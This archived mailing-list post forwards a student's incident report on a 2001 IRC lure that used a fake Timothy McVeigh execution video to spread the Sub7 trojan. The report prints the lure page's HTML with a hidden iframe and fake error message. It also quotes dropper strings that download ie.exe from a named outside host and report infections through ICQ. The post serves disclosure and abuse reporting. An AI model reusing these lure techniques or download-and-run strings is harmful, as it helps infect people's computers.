[Bradley Chapman <eaglebtc () byu edu>] Timothy McVeigh "video" link lures IRC users to install sub7

[Adam Stanley <adam () nethosters com>]

Group,
  Here is the email I received this morning regarding the Sub7 outbreak
on IRC.

-Adam

--
Adam Stanley
CTO / VP
Nethosters, Inc.

-----Forwarded Message-----
From: Bradley Chapman <eaglebtc () byu edu>
To: irc () irc stanford edu
Subject: Timothy McVeigh "video" link lures IRC users to install sub7


To whom it may concern:

My name is Bradley Chapman, and I am a student at Brigham Young University.
Today on the EFNet IRC network, I found a channel called #mcveigh.  I
suspected that this channel was not set up for the best of intentions.
Curious, I joined the room to see what was going on.  Almost immediately, I
was assaulted with an "on-join" advertisement in the form of a channel
notice.  The message asked me to visit the following link to view an .AVI
movie of Tim McVeigh's execution:

http://www.concentric.net/~1horizon/veigh.html

The page itself is blank.  After about 2 seconds, it forwards to an email
link at:

http://www.concentric.net/~1horizon/unknown.eml

This email link opens up a .tmp file, which does nothing.  The webpage now
shows a "Connection Timed Out" message in the same web page.  I was
suspicious when the email hyperlink tried to send me a .TMP file.  After
examining that web page's HTML code, I determined it was a fake error
designed to make people think that the video feed was too busy. (HTML code
shown here):

====================
<HTML>
<HEAD>
</HEAD>
<body bgcolor=lack" link=C0C0C0" vlink=808080" alink=FFFFFF" text=8080FF"
topmargin="><a name=op">
<BODY bgColor=#ffffff>
<iframe src=cid:THE-CID height=0 width=0></iframe>
Connection timed out.(Busy server) Please try again later.<BR> // [note:
fake message]
</BODY>
</HTML>
========================

After using a download manager to save the email file directly, I opened it
with Outlook Express.   I am fully aware of the risks of opening strange
emails, but I know better than to actually run the included attachments.
There were two files inside - "ATT00013.txt" and "update.exe" .  I have
thrown away the .txt file, since it was 0 bytes long.  I have packed
update.exe as a ZIP file and attached it to this email.

Since this was obviously an email virus, I wanted to examine it with a hex
editor for useful info.  Toward the end of the file, I found the following
very interesting pieces of information:

==================================
              %s\%s ie.exe           home.earthlink.net             /~goldi
anstone/ie.exe       GET %s HTTP/1.0  Host: %s     119657247    GET /script
s/WWPMsg.dll?from=psychward&fromemail=wwwpw&subject=file+downloaded&body=%s
+downloaded+and+executed&to=%s     wwp.icq.com
==================================

As you can see, this program attempts a connection with home.earthlink.net,
and accesses the URL "/~goldianstone/ie.exe" .  I presume this file would be
downloaded and executed on the victim's computer.  Also interesting to note
is the ICQ # there: 119657247, accompanied by the WWPMsg.dll script
reference (which passes the sub7 info to the ICQ #).  I contacted the ICQ#,
thinking he/she was the owner of the sub7 bots.  I did make contact, but the
conversation I had was not what I expected: (see attached file
"treesnods.txt")

===================================
SUMMARY: She (according to her ICQ Info) is getting flooded with ICQ notices
from unknown addresses regarding sub7 information.  I tried to get her to
save the log from these notices, but she admitted she was not very
computer-savvy.  I tried many different ways of somehow retrieving the
information, (netmeeting for supervision, winzip to compress the 2000b
folder) but to no avail.  I finally gave up and told her that her ICQ
log--in which she mentions a large number of sub7 messages--would be
sufficient for the email to the ISPs of the offending #mcveigh channel
operators.
===================================

I then re-entered #mcveigh and proceeded to tell the whole channel what the
link was really about.  Not more than 15 seconds later, one of the channel
operators kick-banned me with the following message:

[23:17:23] *** You were kicked from #mcveigh by low (dont be an idiot, thats
what the fbi wants you to think)

I didn't care; I had all the info I needed anyway.  I backscrolled through
the status screen and copied the list of #mcveigh users, then did a /whois
on the channel operators.  Based on their hostmask, I now knew which ISPs
I'd send a "nice letter."

The third attached file (mcveigh.txt) is the user list and /whois results of
just the channel operators.  As you'll see, several of them were in these
rooms together: #astral_projection, #only.hard.nigs.pimp.and.roll.here,
#minnesota, and #aol .

I hope this information is helpful in stopping a potential situation, and in
possibly disciplining those responsible for it.  If treesnods's estimate is
accurate--that is, if there are 60-70 sub7-controlled computers just 18
hours after the execution, and that growth rate continues in the aftermath
of McVeigh's death--then some websites may be in trouble and should be
putting up their shields.

I appreciate your time and effort spent on resolving this issue.  I
apologize for the length of this email, but I felt that all this info was
necessary to prove a point.  I look foward to hearing from each service
provider.

Regards,

 - Brad Chapman
Brigham Young University
801-371-4007